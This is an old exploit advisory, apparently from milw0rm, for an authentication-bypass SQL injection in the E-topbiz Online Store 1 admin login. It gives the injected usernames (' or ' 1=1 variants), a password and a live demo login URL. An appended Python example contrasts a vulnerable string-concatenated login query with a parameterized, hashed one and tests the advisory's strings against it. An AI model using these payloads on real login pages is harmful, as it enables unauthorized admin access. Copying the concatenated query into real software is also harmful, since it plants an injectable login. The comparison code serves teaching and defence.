E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability

author: ZoRLu msn: trt-turk@hotmail.com

Home: www.z0rlu.blogspot.com

NOTE: LONELINESS HAS LOST ITS MEANING IN MY LONELINESS :(( (I'm fed up, damn it)

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


for demo:

http://e-topbiz.com/trafficdemos/store1/admin/login.php

username: admin ' or ' 1=1--

password: ZoRLu


thanks: str0ke & yildirimordulari.org & darkc0de.com

# milw0rm.com [2008-11-07]
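
Added example (not part of the original advisory and not E-topbiz code): a login check built by string concatenation next to a parameterized one, run against the two username strings above. The advisory does not show the application's query, so the table layout, function names, sample password and the SQLite RTRIM collation (standing in for a database that ignores trailing spaces when comparing strings) are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed sample data; the schema is an assumption, not the product's."""
    db = sqlite3.connect(":memory:")
    # RTRIM: trailing spaces are ignored when usernames are compared.
    db.execute("CREATE TABLE admins (username TEXT COLLATE RTRIM, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw = "S3cret-constructed"  # plaintext column exists only for the weak form
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", pw, salt, _hash(pw, salt)))
    return db

def login_concatenated(db, username, password):
    """Weak form: input becomes SQL text. AND binds tighter than OR, so a
    quote in the username can detach the password test from the match."""
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def login_parameterized(db, username, password):
    """Hardened form: the username is bound as data, and the password is
    verified against a salted hash outside the query."""
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_hash(password, salt), pw_hash)

# The two username strings from the advisory, tried with its password value.
ADVISORY_USERNAMES = ["admin ' or ' 1=1", "admin ' or ' 1=1--"]

if __name__ == "__main__":
    db = make_db()
    for name in ADVISORY_USERNAMES:
        print(repr(name), login_concatenated(db, name, "ZoRLu"),
              login_parameterized(db, name, "ZoRLu"))
```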